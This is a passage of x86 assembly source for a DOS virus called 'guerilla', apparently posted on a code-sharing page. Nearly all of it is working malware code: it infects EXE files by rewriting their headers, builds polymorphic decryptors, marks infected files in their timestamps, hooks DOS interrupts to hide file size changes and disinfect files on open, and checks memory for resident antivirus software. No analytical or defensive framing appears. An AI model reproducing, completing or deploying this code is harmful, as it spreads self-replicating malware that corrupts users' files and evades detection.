📄 guerilla.asm
字号:
inc si ; header manipulation start here
sub ax, word ptr [si+7] ; subtract header size
sbb dx, 0 ; 32-bit
mov word ptr [si+15h], ax ; NEW CS
mov word ptr [si+13h], dx ; NEW IP
mov delta, dx
inc ax
mov word ptr [si+0Dh], ax ; NEW SS=CS+1
add ax, 23
rol ax, 1
mov word ptr [si+11h], ax ; infection marker #1
mov polykey, ax ; static polymorphic key
get_key:
and al, 0Fh ; make al < or = 0Fh
or al, al ;
jnz goodkey ; if got 0
inc al ; then make 1
goodkey: mov byte ptr [crypt], al ; for encrypt_decrypt
mov byte ptr [crypt2], al ; for encrypt_decrypt2
mov ch, 16 ;
sub ch, al
mov byte ptr [rotdecrypt],ch ; for encrypt_decrypt
test al, 1 ; random use ror or rol for crypt
jne use_rorah ;
use_rolal: mov byte ptr [scratch],0c0h ; rol al,cl
mov byte ptr [alorah1],05h
mov byte ptr [alorah2],05h
jmp short here
use_rorah: mov byte ptr [scratch],0cch ; ror ah,cl
mov byte ptr [alorah1],25h
mov byte ptr [alorah2],25h
here:
mov word ptr [si+0Fh], 0 ; NEW SP
add word ptr [si+09h],(heap-startvirus)/16 + 1
push si
push di
push bx
mov bx, 3 ; Polymorphics
lea si, [cctable] ;
lea di, [clearcarry2] ;
call polymorph ;
lea di, [clearcarry3] ;
call polymorph ;
lea si, [movax305table] ;
lea di, [movax305] ;
call polymorph ;
lea si, [incditable] ;
lea di, [incdi] ;
call polymorph ;
lea si, [subbxbxtable] ;
lea di, [subbxbx] ;
call polymorph ;
lea si, [movsibptable] ;
lea di, [movsibp] ;
call polymorph ;
lea si, [oredxedxtable] ;
lea di, [oredxedx] ;
call polymorph ;
lea si, [movdi14table] ;
lea di, [movdi14] ;
call polymorph ;
lea si, [adddisitable] ;
lea di, [adddisi] ;
call polymorph ;
mov bx, 2 ; Polymorphics
lea si, [jumpctable] ;
lea di, [jumpc] ;
call polymorph ;
lea si, [jumpztable] ;
lea di, [jumpz] ;
call polymorph ;
lea si, [decedxtable] ;
lea di, [decedx] ;
call polymorph ;
pop bx
pop di
pop si
call getmins
add cx, offset (heap-startvirus)
mov ah, 40h
push si
push di
push es
call messup ; Write virus
pop es
pop di
pop si
mov ax, sizels
mov dx, sizems
add ax, offset heap ; file size + virus size
adc dx, 0
mov cx, 512
div cx
or dx, dx
jz noremainder
inc ax
noremainder: mov word ptr [si+1], dx
mov word ptr [si+3], ax
call movepointertotop
lea dx, [header] ; write from buffer
call writeheader
cont: mov ax, 5701h
mov cx, time
and cx, 0FFE0h
or cx, 000101b ; infection marker #2
mov dx, date
call simint21h
findquit:
popf
pop ds
pop es
pop di
pop dx
pop cx
pop bx
pop ax
pop si
jmp go_int
repservice:
pop si
push di
mov di, dx
cmp byte ptr ds:[di], '$'
pop di
jne go_int
mov bx, 3135h
iret
; -------------------------------------------------------------------------
; INT 21 ah=4eh, 4fh stealth
; -------------------------------------------------------------------------
findstealth:
call simint21h
jc endfs
cmp cs:[stealthon], 0
jz endfs
push es
push cx
push bx
push ax
push di
mov ah, 2fh ; current dta
call simint21h ; ES:BX
xchg di, bx
mov si, di
add di, 16h
add si, 1ah
call searchstcommon
pop di
pop ax
pop bx
pop cx
pop es
clc ; no error
endfs:
pop si
retf 2
; -------------------------------------------------------------------------
; INT 21 ah=11h, 12h stealth
; -------------------------------------------------------------------------
dirstealth:
call simint21h ; call the interrupt
or al, al
jne endds
cmp cs:[stealthon], 0 ; is stealthoff?
jz endds ; then quit
push es
push cx
push bx
push ax
push di
mov ah, 2fh
call simint21h
xchg di, bx
mov bl, byte ptr es:[di] ; extended FCB
xor bl, 0ffh
jne notextended
add di, 7h ; fix for extended
notextended:
mov si, di
add di, 17h
add si, 1dh
call searchstcommon
pop di
pop ax
pop bx
pop cx
pop es
endds:
pop si
iret
;----------------------------------------------------------------------------
; SEARCH STEALTH COMMON ROUTINE BETWEEN INT 11/12, 4E/4F
;----------------------------------------------------------------------------
searchstcommon:
;Entry: di=searchtimeaddr, si=searchsizeaddr
mov ax, word ptr es:[di] ;
mov bx, ax
and ax, 011111b
xor ax, 000101b
jne commonquit ; is marker #2 set?
mov cl, 5
shr bx, cl
and bx, 0111111b
cmp word ptr es:[si+2], 0 ; file big enough to stealth?
jnz st1 ;
cmp word ptr es:[si], 5000 ; file big enough to stealth?
jb commonquit ; it is not
st1:
add bx, offset (heap-startvirus)
sub word ptr es:[si], bx ; subtract the file length
sbb word ptr es:[si+2], 0 ; 32-bit
commonquit:
ret
; -------------------------------------------------------------------------
; Cleanvirus on OPEN 3dh
; -------------------------------------------------------------------------
cleanvirus:
pop si
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
pushf
cmp ah, 6ch ; is it int 21h ah=6ch?
jne skip6c
mov dx, si ; DS:DX now filename
skip6c:
call checkdrive ; is it floppy?
jb stealthexit ; then quit
cmp cs:[stealthon], 0 ; is stealthoff?
jz stealthexit ; then quit
mov ax, 3d00h ; Open read only
call simint21h
jc stealthexit ; quit if cant open
goodopen: xchg bx, ax
push cs
pop ds
call sft
cmp word ptr es:[di+28h], 'XE'
jne stealthquit
call checkmarker ; is marker #2 set?
jnz stealthquit ; else quit
mov ax,word ptr es:[di+11h] ; file size
mov dx,word ptr es:[di+13h]
mov sizels, ax
mov sizems, dx
call getmins
add cx, 1ch
sub ax, cx ; move to where original header is
sbb dx, 0
mov word ptr es:[di+15h],ax ; file pointer
mov word ptr es:[di+17h],dx
lea dx, [origheader] ; read origheader
call readheader
jc stealthquit
call decryptheader
cmp byte ptr [si], 'M' ; was original header found and
jne stealthquit ; reconstructed correctly?
call movepointertotop ; TOF via SFT
call writeheader
jc stealthquit ; quit if cant disinfect
mov ax, sizels
mov dx, sizems
call getmins
add cx, offset heap
sub ax, cx
sbb dx, 0
mov word ptr es:[di+15h],ax ; file pointer
mov word ptr es:[di+17h],dx
mov ah, 40h ; erase virus from original file
xor cx, cx
call simint21h
mov ax, 5701h
mov cx, time
mov dx, date
call simint21h ; restore original time & date
stealthquit: mov ah, 3eh
call simint21h
stealthexit:
popf
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
go_int:
db 0eah ; jmp ssss:oooo
int21o dw ?
int21s dw ?
; -----------------------------------------------------------------------
; Scan MCB's for resident AV s/w
; -----------------------------------------------------------------------
; entry DI=0
; return ZF=0 if none found
; return ZF=1 if one found
checkresav:
push es
push ds
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -